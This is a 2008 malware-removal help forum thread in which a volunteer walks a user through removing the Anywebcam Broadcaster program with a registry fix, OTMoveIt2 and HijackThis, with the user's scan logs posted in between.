Exams.exe|Microsoft-CryptoAPI/5.131.2600.2180\\AdobeUpdateManager.exe|Microsoft-CryptoAPI/5.131.2600.2180\\dpinst.exe|Microsoft-CryptoAPI/5.131.2600.2180\\Explorer.EXE|Microsoft-CryptoAPI/5.131.2600.2180\\firefox.exe|Microsoft-CryptoAPI/5.131.2600.2180\\IMVUClient.exe|Microsoft-CryptoAPI/5.131.2600.2180\\jucheck.exe|Microsoft-CryptoAPI/5.131.2600.2180\\Midtown2.exe|Microsoft-CryptoAPI/5.131.2600.2180\\msiexec.exe|Microsoft-CryptoAPI/5.131.2600.2180\\msnmsgr.exe|Microsoft-CryptoAPI/5.131.2600.2180\\POWERPNT.EXE|Microsoft-CryptoAPI/5.131.2600.2180\\redlightcenter.exe|Microsoft-CryptoAPI/5.131.2600.2180\\Setup.exe|Microsoft-CryptoAPI/5.131.2600.2180\\smc.exe|Microsoft-CryptoAPI/5.131.2600.2180\\SoftwareUpdate.exe|Microsoft-CryptoAPI/5.131.2600.2180\\SopCast.exe|Microsoft-CryptoAPI/5.131.2600.2180\\WgaTray.exe|Microsoft-CryptoAPI/5.131.2600.2180\\WLLoginProxy.exe|Microsoft-CryptoAPI/5.131.2600.2180\\WLSetupSvc.exe|Microsoft-CryptoAPI/5.131.2600.2180\\wmiprvse.exe|Microsoft-CryptoAPI/5.131.2600.2180\\YahooMusicEngine.exe|mozbar 3.04 xpi BETA\\firefox.exe|mozbar 3.05 xpi\\firefox.exe|mozbar 3.06 xpi\\firefox.exe|mozbar 3.11 xpi\\firefox.exe|mozbar 3.12 xpi\\firefox.exe|mozbar 3.15 xpi\\firefox.exe|mozbar 3.16 xpi\\firefox.exe|mozbar 3.17 xpi\\firefox.exe|mozbar 3.18 xpi\\Explorer.EXE|mozbar 3.18 xpi\\firefox.exe|Mozilla Compatible/2.0\\yupdater.exe|Mozilla/3.0\\AcroRd32.exe|Mozilla/4.0\\3dsmax.exe|Mozilla/4.0\\_launcher.exe|Mozilla/4.0\\act.exe|Mozilla/4.0\\ahc.exe|Mozilla/4.0\\aim6.exe|Mozilla/4.0\\Bit_Che.exe|Mozilla/4.0\\BitSpirit.exe|Mozilla/4.0\\Bridge.exe|Mozilla/4.0\\CamtasiaStudio.exe|Mozilla/4.0\\CLVIEW.EXE|Mozilla/4.0\\Corel Snapfire.exe|Mozilla/4.0\\DivX Player.exe|Mozilla/4.0\\DSAgnt.exe|Mozilla/4.0\\dxwsetup.exe|Mozilla/4.0\\EmailMarketingDirector4.exe|Mozilla/4.0\\EXCEL.EXE|Mozilla/4.0\\Explorer.EXE|Mozilla/4.0\\fds.exe|Mozilla/4.0\\FIFA08.exe|Mozilla/4.0\\firefox.exe|Mozilla/4.0\\forumsecrets.exe|Mozilla/4.0\\GameDrvr.exe|Mozilla/4.0\\googletalk.exe|Mozilla/4.0\\GoogleToolbarNotifier.exe|Mozilla/4.0\\HelpHost.exe|Mozilla/4.0\\IBP.exe|Mozilla/4.0\\IEXPLORE.EXE|Mozilla/4.0\\IMVUClient.exe|Mozilla/4.0\\jre-6u2-windows-i586-p-iftw_7070c3f7.exe|Mozilla/4.0\\jre-6u3-windows-i586-p-iftw_2cd32978.exe|Mozilla/4.0\\jre-6u5-windows-i586-p-iftw_1b121abb.exe|Mozilla/4.0\\mbam.exe|Mozilla/4.0\\Metacafe.exe|Mozilla/4.0\\msnmsgr.exe|Mozilla/4.0\\msohelp.exe|Mozilla/4.0\\MSTORDB.EXE|Mozilla/4.0\\MSTORE.EXE|Mozilla/4.0\\paltalk.exe|Mozilla/4.0\\POWERPNT.EXE|Mozilla/4.0\\realplay.exe|Mozilla/4.0\\RecordingManager.exe|Mozilla/4.0\\redlightcenter.exe|Mozilla/4.0\\RunDll32.exe|Mozilla/4.0\\Scrabble-WT.exe|Mozilla/4.0\\selfpub1.exe|Mozilla/4.0\\setup_wm.exe|Mozilla/4.0\\SiteMapMaker.exe|Mozilla/4.0\\SoftwareUpdate.exe|Mozilla/4.0\\SopCast.exe|Mozilla/4.0\\svchost.exe|Mozilla/4.0\\temp0.exe|Mozilla/4.0\\The Rise of Atlantis.exe|Mozilla/4.0\\thought1.exe|Mozilla/4.0\\TVUPlayer.exe|Mozilla/4.0\\update.exe|Mozilla/4.0\\WinBej2-WT.exe|Mozilla/4.0\\WINWORD.EXE|Mozilla/4.0\\wmplayer.exe|Mozilla/4.0\\x.exe|Mozilla/4.0\\YahooMessenger.exe|Mozilla/4.0\\YahooMusicEngine.exe|Mozilla/4.0\\YAHOOM~1.EXE|Mozilla/5.0\\Explorer.EXE|Mozilla/5.0\\firefox.exe|Mozilla/5.0\\Safari.exe|MOZILLA/5.0\\SiteMapMaker.exe|Mozilla/5.0\\YahooWidgetEngine.exe|MSDW\\dwwin.exe|MSDW\\wmplayer.exe|MusicNet HttpConnector 3.9.0.3009\\YahooMusicEngine.exe|Nero StartSmart\\NeroStartSmart.exe|NOD32 Update\\nod32krn.exe|NSIS_InetLoad\\toolbar.exe|NSIS_INETLOAD\\widgetsus.4.0.5.0x184b.nobundle.exe|NSIS_INETLOAD\\widgetsus.exe|NSISDL/1.2\\DivXComponentInstaller.exe|NSPlayer/11.0.5721.5145 WMFSDK/11.0\\firefox.exe|NSPlayer/11.0.5721.5145 WMFSDK/11.0\\iexplore.exe|NSPlayer/11.0.5721.5145 WMFSDK/11.0\\SopCast.exe|NSPlayer/11.0.5721.5145 WMFSDK/11.0\\TVUPlayer.exe|NSPlayer/11.0.5721.5145 WMFSDK/11.0\\wmplayer.exe|NSPlayer/11.0.5721.5145\\firefox.exe|NSPlayer/11.0.5721.5145\\iexplore.exe|NSPlayer/11.0.5721.5145\\redlightcenter.exe|NSPlayer/11.0.5721.5145\\wmplayer.exe|On2 Technologies URL Access\\MsiExec.exe|OpenOffice.org 2.3\\soffice.BIN|OpenUrl\\paltalk.exe|Opera/9.24\\Explorer.EXE|Opera/9.24\\Opera.exe|PalTalk Installer Download\\install_Paltalk.exe|PCU\\Corel Snapfire.exe|PlaxoAimUpgrade\\aim6.exe|PostMEGAUPLOADTOOLBAR\\IEXPLORE.EXE|Python-urllib/2.4\\MDirect.exe|Python-urllib/2.5\\IMVUClient.exe|QuickTime/7.2\\firefox.exe|QuickTime/7.2\\QuickTimePlayer.exe|QuickTime/7.3.1\\firefox.exe|QuickTime/7.3.1\\QuicktimePlayer.exe|QuickTime/7.3\\firefox.exe|QuickTime/7.4.1\\firefox.exe|QuickTime/7.4.1\\QuickTimePlayer.exe|QuickTime/7.4.5\\firefox.exe|QuickTime/7.4.5\\QuickTimePlayer.exe|QuickTimeWinInet\\firefox.exe|RD 2.2.1.30\\autoupgrade.exe|RD 2.2.1.30\\TVUPlayer.exe|RMA/1.0\\firefox.exe|RMA/1.0\\RealPlay.exe|RMA/1.0\\RecordingManager.exe|RNSetup\\temp0.exe|RootEXE\\action.exe|RPInstaller\\xpinstall.exe|RTPatch Auto Update\\Launcher.exe|SC/201 0 3e752a03:0:0 Windows\\iexplore.exe|SC/201 0 3e752e17:0:0 Windows\\SopCast.exe|SC/201 1004 3e752e18:10109:8902 Windows\\iexplore.exe|SC/201 1009 3e75353f:13469:8902 Windows\\iexplore.exe|SC/201 101100 3e752aa1:11559:8902 Windows\\iexplore.exe|SC/201 101100 3e752aa1:6384:8902 Windows\\iexplore.exe|SC/201 101100 3e752aa1:8345:8902 Windows\\iexplore.exe|SC/201 11910 3e752efd:6515:8902 Windows\\SopCast.exe|SC/201 11910 3e75353f:8760:8902 Windows\\SopCast.exe|SC/201 22508 3e752e17:10573:8902 Windows\\iexplore.exe|SC/201 33767 3e752a3f:8230:8902 Windows\\iexplore.exe|SC/201 34250 3e752e17:6437:8902 Windows\\iexplore.exe|SC/201 34250 3e752e17:7404:8902 Windows\\iexplore.exe|SC/201 3606 3e753666:6767:8902 Windows\\iexplore.exe|SC/201 43343 3e752a84:5579:8902 Windows\\iexplore.exe|SC/201 6001 3e7533ab:10445:8902 Windows\\iexplore.exe|SC/201 6029 3e7533ab:10445:8902 Windows\\iexplore.exe|SC/201 6816 3e753666:13819:8902 Windows\\iexplore.exe|SCAgent\\Explorer.EXE|SearchWithGoogle\\GoogleToolbarNotifier.exe|session name\\firefox.exe|SfMarket\\Forge80.exe|Shareaza 2.2.3.0\\Shareaza.exe|Shareaza 2.2.5.0\\Shareaza.exe|Shareaza 2.3.1.0\\Shareaza.exe|Shareaza\\Shareaza.exe|Shockwave Flash\\aim6.exe|Shockwave Flash\\Dreamweaver.exe|Shockwave Flash\\firefox.exe|Shockwave Flash\\Fireworks.exe|Shockwave Flash\\Flash.exe|Shockwave Flash\\Safari.exe|Skype™ 3.0\\Skype.exe|SL CDDB 2.0\\YahooMusicEngine.exe|SL CDDB 2.0\\ymusicid.exe|SopCast Utils\\iexplore.exe|SopCast Utils\\SopCast.exe|SRL\\firefox.exe|StubInstaller\\temp0.exe|Sygate Personal Firewall Service\\smc.exe|talkback/1.0; Win32\\aolload.exe|Total Uninstall\\Tu.exe|Update\\SopAdver.exe|Update_Detector\\UpdateDetector.exe|User-Agent: Mozilla/5.0\\firefox.exe|VCSoapClient\\hpzwup01.exe|Viper\\realplay.exe|Windows Installer\\msiexec.exe|Windows Live Setup 2.0\\Install_WLMessenger.exe|Windows-Media-Player/11.0.5721.5145\\firefox.exe|Windows-Media-Player/11.0.5721.5145\\wmplayer.exe|Windows-Media-Player/11.0.5721.5230\\firefox.exe|Windows-Media-Player/11.0.5721.5230\\iexplore.exe|Windows-Media-Player/11.0.5721.5230\\wmplayer.exe|Windows-Update-Agent\\firefox.exe|Windows-Update-Agent\\svchost.exe|WinInetRequest 1.0\\YahooMusicEngine.exe|Wise\\GLB2142.tmp|Wise\\GLB2705.tmp|Xenu Link Sleuth 1.2j\\Xenu.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Popular\Broadcaster]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"c:\\program files\\anywebcam\\Broadcaster.exe"="Broadcaster"

; End Of The Log...

#15 TheJoker

TheJoker

    Forum Deity

  • Boot Camp Mod
  • PipPipPipPipPip
  • 14,352 posts

Posted 19 June 2008 - 05:09 PM

Please run Notepad and paste the following text in the Code box into a new file:

REGEDIT4
[-HKEY_LOCAL_MACHINE\SOFTWARE\Anywebcam]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Popular\Broadcaster]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"c:\\program files\\anywebcam\\Broadcaster.exe"=-
Save the file to the desktop as fix.reg and make sure the "Save as Type" field says "All Files". Then please go to the desktop and double-click on fix.reg, and click Yes to merge it with the registry.

Please download OTMoveIt2 by OldTimer.
  • Save it to your desktop.
  • Please double-click OTMoveIt2.exe to run it.
  • Copy the file path below to the clipboard by highlighting it and pressing CTRL + C (or, after highlighting, right-click and choose Copy):

    C:\Program Files\anywebcam

  • Return to OTMoveIt2, right click in the "Paste List of Files/Folders to be Moved" window (on the left side) and choose Paste.
  • Click the red Moveit! button.
  • Copy everything in the Results window (under the green bar) to the clipboard by highlighting ALL of them and pressing CTRL + C (or, after highlighting, right-click and choose copy), paste it into a new Notepad file, save it to your Desktop as OTMoveIt2.txt, and paste it in your next reply.
  • Close OTMoveIt2
If a file or folder cannot be moved immediately you may be asked to reboot the machine to finish the move process. If you are asked to reboot the machine choose Yes.

Please post a new HijackThis log, the log from OTMoveIt2, and note any errors encountered.
Does your problem continue?

Free Tools for Fighting Malware
Anti-Virus: avast! Free Antivirus / Avira Free AntiVirus
OnLine Anti-Virus: ESET / BitDefender / F-Secure
Anti-Malware: Malwarebytes' Anti-Malware / Dr.Web CureIt
Spyware/Adware Tools: MVPS HOSTS File / SpywareBlaster
Firewall: Comodo Firewall Free / Privatefirewall
Tutorials: How did I get Infected? / Internet Explorer Privacy & Security Settings
If we have helped, please help us continue the fight by using the Donate button, or see this topic for other ways to donate.

MS MVP 2009-20010 and ASAP Member since 2005


#16 a_fahmy7

a_fahmy7

    Advanced Member

  • Full Member
  • PipPipPip
  • 109 posts

Posted 19 June 2008 - 10:00 PM

no rebooting was required.
program short cut and listing in start>programs is still there, but the program folder is gone from c:>program files . And when i click the Broadcaster shortcut, windows try to search for the file exe and can't find it of course :D Good News??

Also, I restarted windows and no error messages appeared



Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 5:55:18 AM, on 6/20/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Sygate\SPF\smc.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\WLTRAY.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\WINDOWS\VMSnap3.EXE
C:\WINDOWS\Domino.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
C:\Documents and Settings\Ahmed Fahmy\My Documents\My Downloads\HiJackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://jobreeze.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft....k/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft....k/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.c...rch/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft....k/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Page_URL = www.google.com/ig/dell?hl=en&client=dell-usuk-rel&channel=us&ibd=6061214
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://us.rd.yahoo.c...//www.yahoo.com
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MI1933~1\Office12\GRA8E1~1.DLL
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O3 - Toolbar: (no name) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - (no file)
O4 - HKLM\..\Run: [Broadcom Wireless Manager UI] C:\WINDOWS\system32\WLTRAY.exe
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [VMSnap3] C:\WINDOWS\VMSnap3.EXE
O4 - HKLM\..\Run: [Domino] C:\WINDOWS\Domino.EXE
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Startup: Yahoo! Widget Engine.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
O4 - Global Startup: Bluetooth.lnk = ?
O8 - Extra context menu item: Download Using &BitSpirit - C:\Program Files\BitSpirit\bsurl.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Send to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra button: Bonjour - {7F9DB11C-E358-4ca6-A83D-ACC663939424} - C:\Program Files\Bonjour\ExplorerPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\Office12\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {20A60F0D-9AFA-4515-A0FD-83BD84642501} (Checkers Class) - http://messenger.zon...kr.cab56986.cab
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} - http://download.mcaf...01/mcinsctl.cab
O16 - DPF: {5D6F45B3-9043-443D-A792-115447494D24} (UnoCtrl Class) - http://messenger.zon...1/GAME_UNO1.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) - http://messenger.zon...ro.cab56649.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zon...nt.cab56907.cab
O16 - DPF: {DA758BB1-5F89-4465-975F-8D7179A4BCF3} (WheelofFortune Object) - http://messenger.zon...oF.cab57176.cab
O16 - DPF: {F5A7706B-B9C0-4C89-A715-7A0C6B05DD48} (Minesweeper Flags Class) - http://messenger.zon...er.cab56986.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{BF5CCFB5-6096-404D-B329-56E8F3847FA6}: NameServer = 62.117.40.111,62.117.40.112
O17 - HKLM\System\CCS\Services\Tcpip\..\{CA254E2C-5690-497E-9971-569C6268C2DB}: NameServer = 62.117.40.111,80.75.166.250
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MI1933~1\Office12\GR99D3~1.DLL
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: AOL Connectivity Service (AOL ACS) - America Online, Inc. - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: GoogleDesktopManager - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktopManager.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: mental ray 3.5 Satellite (32-bit) (mi-raysat_3dsmax9_32) - Unknown owner - C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
O23 - Service: MySQL - Unknown owner - C:\Program.exe (file missing)
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Sygate Personal Firewall Pro (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\SPF\smc.exe
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: TuneUp Drive Defrag Service (TuneUp.Defrag) - TuneUp Software GmbH - C:\WINDOWS\System32\TuneUpDefragService.exe
O23 - Service: Dell Wireless WLAN Tray Service (wltrysvc) - Unknown owner - C:\WINDOWS\System32\WLTRYSVC.EXE

--
End of file - 10610 bytes


OTMoveIt2:


C:\Program Files\anywebcam\Design\panels moved successfully.
C:\Program Files\anywebcam\Design\buttons moved successfully.
C:\Program Files\anywebcam\Design\backgrounds moved successfully.
C:\Program Files\anywebcam\Design moved successfully.
C:\Program Files\anywebcam moved successfully.

OTMoveIt2 by OldTimer - Version 1.0.4.2 log created on 06202008_055235

Edited by a_fahmy7, 19 June 2008 - 10:51 PM.


#17 TheJoker

TheJoker

    Forum Deity

  • Boot Camp Mod
  • PipPipPipPipPip
  • 14,352 posts

Posted 19 June 2008 - 11:31 PM

program short cut and listing in start>programs is still there

Click on Start > Programs, locate the program group or shortcut for Broadcaster, right-click on it and select Delete.

Now you need to run HijackThis and click "Do a system scan only." Place a check next to the following entries (if they are still there):

R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O3 - Toolbar: (no name) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - (no file)


Now close all browser and other windows except for HijackThis, and click "Fix Checked" to have HijackThis fix the entries you checked.

Open OTMoveIt2 and click the CleanUp! button on top.
In the left pane, it will display a list of tools and other related files which you may have downloaded/used during our cleanup along with backup folders that were created with the bad files present. They are not needed anymore, so OtMoveIt2 will delete them.
The program needs to download the list of tools, so if your firewall says that OTMoveIt2 is attempting to access the Internet, you need to allow it.
Do not edit anything in that Window!
Don't worry if it displays some tools you didn't download/use.
Click Yes when it asks to Begin cleanup process.
Then reboot your computer when finished.

How is everything now?

Free Tools for Fighting Malware
Anti-Virus: avast! Free Antivirus / Avira Free AntiVirus
OnLine Anti-Virus: ESET / BitDefender / F-Secure
Anti-Malware: Malwarebytes' Anti-Malware / Dr.Web CureIt
Spyware/Adware Tools: MVPS HOSTS File / SpywareBlaster
Firewall: Comodo Firewall Free / Privatefirewall
Tutorials: How did I get Infected? / Internet Explorer Privacy & Security Settings
If we have helped, please help us continue the fight by using the Donate button, or see this topic for other ways to donate.

MS MVP 2009-20010 and ASAP Member since 2005


#18 a_fahmy7

a_fahmy7

    Advanced Member

  • Full Member
  • PipPipPip
  • 109 posts

Posted 20 June 2008 - 08:30 AM

Everything seems fine now :). Did as you told me.
I also used the windows search feature for the terms "anywebcam" and "broadcaster", Nothing returned.

I uninstalled the yahoo toolbar yesterday, this may explains the missing files entires in hijack this. Here's the most recent one:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 4:21:17 PM, on 6/20/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Sygate\SPF\smc.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\WLTRAY.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\WINDOWS\VMSnap3.EXE
C:\WINDOWS\Domino.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Documents and Settings\Ahmed Fahmy\My Documents\My Downloads\HiJackThis.exe
\?\C:\WINDOWS\system32\WBEM\WMIADAP.EXE

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://jobreeze.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft....k/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft....k/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.c...rch/search.html
